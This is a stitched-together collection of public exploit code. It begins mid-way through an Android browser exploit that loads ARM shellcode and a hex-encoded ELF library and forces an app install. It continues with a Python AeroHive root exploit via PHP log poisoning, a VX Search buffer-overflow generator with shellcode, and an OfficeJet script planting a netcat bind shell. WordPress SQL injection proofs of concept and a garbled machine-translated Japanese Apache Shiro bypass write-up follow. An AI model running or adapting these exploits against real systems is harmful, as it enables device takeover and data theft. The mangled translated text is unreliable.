xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,];
var so_str = "7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b0000001000000005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c0000000100000002000000f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000";
var arrayBuffer = new ArrayBuffer(0x1000000);
var arrayBufferAddress = getObjAddr(arrayBuffer)-1;
var backingStoreAddress = read_uint32(arrayBufferAddress+4*4);
var args_address = backingStoreAddress+1024;
function write_shellcode(dlsym_addr,buffer){
//ldr r0,[pc,4]//0xe59f0004
//ldr r1,[pc,4]//0xe59f1004
//b shellcode;//0xea000001
//dlopen_addr//array_buffer_address
//dlsym_addr
//shellcode
//var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];
var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];
for(var i=0;i<stub.length;i++){
globaldv[buffer/4+i]=stub[i];
}
shellcode = shellcode.concat([0,0,0,0]);
for(var i=0;i<shellcode.length/4>>>0;i++){
// u8arr[i+4*stub.length]=shellcode[i];
globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);
}
return stub.length*4+shellcode.length;
}
function xss_code(){
//alert(navigator.userAgent);
//alert(document.cookie);
var i1=setInterval(function(){
if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){
console.log("wait load complete");
return;
}
clearInterval(i1);
var i2=setInterval(function(){
document.getElementsByClassName("price buy id-track-click")[0].click();
var installButton = document.getElementById("purchase-ok-button");
if(installButton == null)
return;
installButton.click();
document.write("<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>");
clearInterval(i2);
setTimeout(function(){
window.open("intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end");
},26000);
},500);
},500);
}
var js_str="\n"+xss_code.toString()+"xss_code();\n";
//var backup_arr = backup_original_code(huge_func_code_entry);
var writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);
var args_view = new DataView(arrayBuffer,1024,100);
var so_file_view = new DataView(arrayBuffer,4096);
var js_view = new DataView(arrayBuffer,0x100000);
args_view.setUint32(0,dlsym_addr+0xc,true);
args_view.setUint32(4,dlsym_addr,true);
args_view.setUint32(8,huge_func_code_entry,true);
args_view.setUint32(12,writed_len,true);
args_view.setUint32(16,backingStoreAddress+4096,true);
args_view.setUint32(20,so_str.length/2,true);
args_view.setUint32(24,backingStoreAddress+0x100000,true);
args_view.setUint32(28,js_str.length,true);
print("length is "+so_str.length);
for(var i=0;i<so_str.length;i+=2){
var value = so_str.substr(i,2);
value = "0x"+value;
so_file_view.setUint8(i/2,parseInt(value));
}
for(var i=0;i<js_str.length;i++){
js_view.setUint8(i,js_str.charCodeAt(i));
}
print("begin execute shellcode");
huge_func({});
print("done");
postMessage(true);
//prevent arrayBuffer to be released
while(1){}
}
//main world
function print(){
console.log.apply(null,arguments);
document.write('<p >');
document.write.apply(document,arguments);
document.write("<p>");
}
// Build a worker from an anonymous function body
var blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );
var worker;
var exploitSucc = false;
var count = 0;
function startExploit(){
print("worker thread is started");
worker = new Worker( blobURL );
count++;
worker.onmessage = function(e){
print("exploit result is "+e.data);
exploitSucc = e.data;
if(exploitSucc==false){
startExploit();
return;
}
var end = +new Date();
print("time diff is "+(end-begin)/1000);
//top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';
top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';
}
}
var begin = +new Date();
startExploit();
var savedCount = 0;
var hangMonitor = setInterval(function (){
if(exploitSucc==true){
clearInterval(hangMonitor);
}else{
if(savedCount==count){//maybe hang
print("worker maybe hange");
worker.terminate();
startExploit();
}else{
print("worker is normal");
savedCount = count;
}
}
},10000);
//URL.revokeObjectURL( blobURL );
</script>
</html>
#!/usr/bin/python3
# TARGET: AeroHive AP340 HiveOS < 6.1r5
# Confirmed working on AP340 HiveOS 6.1r2
# This program uses a local file inclusion vulnerability
# 1. Poison the log file in /var/log/messages by injecting PHP code into the
# username field of the login page
# 2. Call the uploaded PHP shell with the LFI URL, changing the root password for SSH
# 3. Login with SSH as root using password "password"
import sys
from urllib.parse import urlencode
from urllib.request import Request, urlopen
import urllib
# Payload to poison the log file at /var/log/messages
# Note if you mess up and get invalid syntax errors just reboot AP it
# will erase/rotate the logs
payload_inject = "<?php if(isset($_REQUEST[\'cmd\'])){ $cmd = ($_REQUEST[\"cmd\"]); system($cmd); echo \"</pre>$cmd<pre>\"; die; } ?>"
# URL of the login page where we will inject our PHP command exec code so it poisons the log file
post_url= "/login.php5?version=6.1r2"
post_fields = {"login_auth" : "1", "miniHiveUI" : "1", "userName" : payload_inject, "password" : "1234"}
post_fields = urllib.parse.urlencode(post_fields)
data = post_fields.encode('ascii')
# Payload to call the injected PHP code
payload_lfi_url = "/action.php5?_action=get&_actionType=1&_page=../../../../../../../../../../var/log/messages%00&cmd="
# Payload to change the root SSH user password
payload_command = "echo+root:password+|+/usr/sbin/chpasswd"
# Combined payload to change password using LFrI
payload_chpasswd = payload_lfi_url+payload_command
print("\n* * * * * AeroHive AP340 HiveOS < 6.1r2 Root Exploit * * * * *\n")
# Get target URL from user
print("\nPlease enter the IP address of the AeroHive AP340 ex: 192.168.1.1\n")
wap_ip = input(">>> ")
base_url = "http://" + wap_ip
# Poison log file with POST to login page
# json_data = json.dumps(post_fields).encode("utf8")
# request = urllib.request.Request(base_url+post_url, post_fields)
print ("Poisoning log file at /var/log/messages. . .")
request = urllib.request.Request(base_url+post_url, data)
json = urlopen(request).read().decode()
# Change the command with LFI->command execution
print("Interacting with PHP shell to change root password. . .")
content = urllib.request.urlopen(base_url+payload_chpasswd).read()
if "Password for " in content.decode('ascii'):
print("Success!")
print("Now try to log in with root:password via SSH!")
else:
print("Exploit Failed")
import os
import struct
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: VX Search Enterprise v9.7.18 Import Local Buffer Overflow Vuln.
# Date: 2017.06.15
# Exploit Author: Greg Priest
# Version: VX Search Enterprise v9.7.18
# Tested on: Windows7 x64 HUN/ENG Professional
'''
overflow = "A" * 1536
jmp_esp = "\x4E\x21\x1F\x65"
#"\x94\x21\x1C\x65"
shortjump = "\xEB\x55"
shellcode3= ("\xbe\x7a\x1f\x2d\x97\xda\xd5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x30\x83\xc2\x04\x31\x72\x0f\x03\x72\x75\xfd\xd8\x6b\x61\x83"
"\x23\x94\x71\xe4\xaa\x71\x40\x24\xc8\xf2\xf2\x94\x9a\x57\xfe"
"\x5f\xce\x43\x75\x2d\xc7\x64\x3e\x98\x31\x4a\xbf\xb1\x02\xcd"
"\x43\xc8\x56\x2d\x7a\x03\xab\x2c\xbb\x7e\x46\x7c\x14\xf4\xf5"
"\x91\x11\x40\xc6\x1a\x69\x44\x4e\xfe\x39\x67\x7f\x51\x32\x3e"
"\x5f\x53\x97\x4a\xd6\x4b\xf4\x77\xa0\xe0\xce\x0c\x33\x21\x1f"
"\xec\x98\x0c\x90\x1f\xe0\x49\x16\xc0\x97\xa3\x65\x7d\xa0\x77"
"\x14\x59\x25\x6c\xbe\x2a\x9d\x48\x3f\xfe\x78\x1a\x33\x4b\x0e"
"\x44\x57\x4a\xc3\xfe\x63\xc7\xe2\xd0\xe2\x93\xc0\xf4\xaf\x40"
"\x68\xac\x15\x26\x95\xae\xf6\x97\x33\xa4\x1a\xc3\x49\xe7\x70"
"\x12\xdf\x9d\x36\x14\xdf\x9d\x66\x7d\xee\x16\xe9\xfa\xef\xfc"
"\x4e\xf4\xa5\x5d\xe6\x9d\x63\x34\xbb\xc3\x93\xe2\xff\xfd\x17"
"\x07\x7f\xfa\x08\x62\x7a\x46\x8f\x9e\xf6\xd7\x7a\xa1\xa5\xd8"
"\xae\xc2\x28\x4b\x32\x05")
crash = overflow+jmp_esp+"\x90"*24+shortjump+"\x90"*76+"\x90" * 58+shellcode3
evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
exploit = open('Magic.xml', 'w')
exploit.write(evil)
exploit.close()
print "Magic.xml raedy!"
##
# Create a bind shell on an unpatched OfficeJet 8210
# Write a script to profile.d and reboot the device. When it comes
# back online then nc to port 1270.
#
# easysnmp instructions:
# sudo apt-get install libsnmp-dev
# pip install easysnmp
##
import socket
import sys
from easysnmp import snmp_set
profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n'
'\tmkfifo /tmp/pwned\n'
'\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n
'fi\n')
if len(sys.argv) != 3:
print '\nUsage:upload.py [ip] [port]\n'
sys.exit()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)
dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(profile_d_script)) + ' NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
dir_query += profile_d_script
dir_query += '\x1b%-12345X'
sock.sendall(dir_query)
sock.close()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock1.connect(server_address)
dir_query = '@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
sock1.sendall(dir_query)
response = ''
while True:
data = sock1.recv(1)
if '\n' == data: break
response += data
print response
snmp_set('.1.3.6.1.2.1.43.5.1.1.3.1', 4, 'integer', hostname='192.168.1.158', community='public', version=1)
print 'Done! Try port 1270 in ~30 seconds'
# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
# Date: 04-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://wordpress.org/plugins/event-list/
# Version: 0.7.8
# CVE : CVE-2017-9429
# Category: webapps
1. Description:
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id
=1 AND SLEEP(10)
3. Solution:
The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.
4. Reference:
http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
ction-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
# Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
# Date: 11-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
# Vendor Homepage: http://www.intensewp.com/
# Version: 1.4
# CVE : CVE-2017-9603
# Category: webapps
1. Description:
SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
allows authenticated users to execute arbitrary SQL commands via the jobid
parameter to wp-admin/edit.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j
obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment
3. Solution:
A new version of WP Jobs is available. Update the WordPress WP Jobs to the
latest version.
4. Reference:
http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603
0x00脆弱性の説明
Apache Shiroは、認証、承認、パスワード、セッション管理を実行する強力で使いやすいJavaセキュリティフレームワークです。 Apache Shiro Authenticationバイパス脆弱性CVE-2020-11989の以前の修正パッチに欠陥がありました。 1.5.3以前には、ShiroがURLを処理する際にまだ春と違いがあるため、ID検証バイパスの脆弱性がまだあります。認証要求の処理がエラーにより、リモート攻撃者は、特別に作成されたHTTPリクエストを送信し、認証プロセスをバイパスし、アプリケーションへの不正アクセスを取得できます。
0x01脆弱性の影響
apache shiro 1.6.0
0x02環境構築
1。プロジェクトをローカルhttps://github.com/l3yx/springboot-shiro2にダウンロードします。 POM.xmlの1.5.2を1.5.3で置き換え、SRC/Main/Java/org/syclover/srpingbootshirologingincontrollerで/admin/pageで/admin/{name} 
3でバックグラウンド検証を交換します。 Idea Editorを再構築して実行します。コンパイルされた戦争パッケージをTomcatの下のWebAppsディレクトリに入れて実行します。 https://github.com/backlion/demo/blob/master/srpingboot-shiro-0.1-snapshot.war
0x03コード説明
1。 shiroconfig.java(pringboot-shiro-master \ src \ main \ java \ org \ syclover \ srpingbootshiro \ shiroconfig.java)許可設定。 /admin/*リソースを要求するとき、302はアイデンティティ認証のためにログインページにジャンプします名前の名前(アイデンティティ認証のトリガー)
0x04脆弱性の再発
1。リクエストルートでリソース名が指定されていない場合、認証はトリガーされず、リソースが返されません。
33http://192.168.1.9:8080/srpingboot-shiro-0.0.1-snapshot/admin 
2。リクエストルートでリソース名を指定する場合、302は認証ページにジャンプします:http://192.168.1.933608080/srpingboot-shiro-0.0.1-snapshot/login 
3。特定のPOCリクエストを作成すると、指定されたリソースがリクエストされる場合、認証はトリガーされず、許可はバイパスされます(%3Bでバイパス)3http://192.168.1.1.9:80800/SRPINGBOOT-SHIRO-0.0.1-SNAPSHOT/ADMIN/
0x05脆弱性分析
問題はorg.apache.shiro.web.util.webutilsにあることがわかります。ここにブレークポイントを置いてからデバッグしてください。
が更新され、getServletpathとgetpathinfoを使用してURLを取得しました。ただし、実際の脆弱性ポイントはここにありません。
スプライシング後のURLが大丈夫であることがわかります。
のセミコロン処理を削除した後、 /admin /*のみが保持されていることがわかります。テスト用のコントローラーへのルートを追加/管理することができます@getMapping( '/admin*')
public string admin2(){
返品「ログインしてください、admin」;
} http://192.168.1.933608080/srpingboot-shiro-0.0.1-snapshot/admin/*
アクセスを確認する許可はありません。もちろん、後でパラメーターを追加すると、アクセス許可が必要です。
フォローアップremovesemicolon
同様に、コンテンツの後。を含む。
Springがそれをどのように処理するか見てみましょう
Springには問題がありません。
URLを処理する方法を見てみましょう
`org.springframework.web.util.urlpathhelper#decodeandcleanuristring 
removesememicoloncontent#remove;そして後の部分
decoderequestString#urldecodeデコード
getAnitizedPath#を置き換える//shiroは反対の
であるが、urldecodeが最初に実行され、それが削除され、脆弱性デバッグの場所:shiro-web-1.5.3.jar //org.apache.shiro.util.webutils.java
//行111
public static string getpathwithinapplication(httpservletrequestリクエスト){
return remormize(removesemicolon(getservletpath(request) + getpathinfo(request)));
} pring-web-5.2.5.Release.jar //org.springframework.web.util.urlpathhelper.java
//行459
private string decodeandcleanuristring(httpservletrequest request、string uri){
uri=removesemicoloncontent(uri);
uri=decoderequestString(request、uri);
